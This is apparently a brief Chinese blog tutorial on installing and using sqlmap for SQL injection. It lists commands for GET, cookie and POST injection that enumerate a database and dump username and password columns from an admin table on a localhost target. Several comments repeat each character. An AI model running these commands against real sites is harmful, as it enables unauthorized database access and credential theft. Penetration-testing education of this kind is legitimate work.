神器sqlmap的简单使用

sqlmap

sqlmap强大的注入工具, 跨平台, 使用python编写, 可以自定义tamper脚本

安装

linux下

sudo apt-get install sqlmap # 前提是已经有python的环境变量

运行sqlmap

sqlmap -u url # 直接sqlmap就可以
或者python sqlmap -u 也可以

win

先配置好python2的环境变量, 再从官网上下载sqlmap的源码包, 将sqlmap文件夹放在python的安装路径之下. 尝试

python sqlmap.py -u # 看看是否可以正常运行

运行sqlmap

必须加python才可以

三种注入判断方式

基本get注入及返回目标基本信息

python sqlmap.py -u "url" 

获取数据库内数据:

python sqlmap.py -u url --dbs # --current-dbs 当前数据库
python sqlmap.py -u url -D 数据库名 --tables # 指定数据库内的表信息
python sqlmap.py -u url -D 数据库名 -T 表名 --columns # 数据库内表内的信息
python sqlmap.py -u url -D 数据库名 -T 表名 -C 指定的字段名 --dump 获取指定的字段内容

cookie注入

python sqlmap.py -u "url" --cookie "id=xx" --level 2

简单使用:

python sqlmap.py -u http://127.0.0.1:81/1/1/shownews.asp --cookie "id=27" --level 2 --dbs//判判断断是是否否存存在在cookie注入
python sqlmap.py -u http://127.0.0.1:81/1/1/shownews.asp --cookie "id=27" --level 2 -D xx --tables //猜解表名
python sqlmap.py -u http://127.0.0.1:81/1/1/shownews.asp --cookie "id=27" --level 2 -D xx -T admin --columns//猜解admin表表名名下下的的列列名名
python sqlmap.py -u http://127.0.0.1:81/1/1/shownews.asp --cookie "id=27" --level 2 --dump -C"username,password" -T admin -D xxx //获获取取指指定定列列名名admin下的数据

post注入

python sqlmap.py -u "url" --data "xx=xx&xx=xx"

基本使用同上

个人网站